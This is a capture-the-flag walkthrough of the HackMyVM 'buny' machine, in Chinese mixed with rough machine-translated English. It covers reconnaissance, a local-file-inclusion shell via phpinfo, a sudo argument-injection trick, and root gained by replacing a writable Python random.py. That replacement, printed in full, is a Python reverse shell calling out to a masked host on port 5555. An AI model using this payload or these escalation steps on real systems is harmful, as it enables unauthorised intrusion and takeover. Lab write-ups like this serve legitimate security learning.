hackmyvm-buny walkthrough

难度(作者评价)：difficult

信息收集

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

获取shell

Very little port information,常规操作,访问80,爆破目录.


upload.php,password.txt,config.phpAll are text files with no real meaning.phpinfo.phpInformation about the host was leaked.

能想到的就是index.php是不是存在ssrf.于是利用ffuf对index.php进行参数fuzz,得到参数pageis the actual request parameter.

由于allow_url_include是off,So there is no way to do itphp://input和data协议利用. Blast log files also cannot be exploited for local file inclusion fetchesshell.

同时webThere is no upload point in the service,So refer to the articlephp文件包含漏洞（利用phpinfo）复现^[1],成功上传shell.

切换用户

Obtained for ease of operationpty,反弹一个shell,查看sudo.

magic文件如下：

#/bin/bash
$1 $2 $3 -T -TT 'sh #'

It's easy to switch to userchris,得到第一个flag.

提权至root

利用pspy64可以看到rootRunning every minutependu.py.
This file does nothing,但是引入了random.


从图中可以看到random是可以修改的.于是将randomChange it to a bounceshell.

[email protected]:~$ cat /usr/lib/python3.7/random.py
cat /usr/lib/python3.7/random.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("*.*.*.*",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

成功获取root权限.

参考

1. https://www.cnblogs.com/xiaoqiyue/p/10158702.html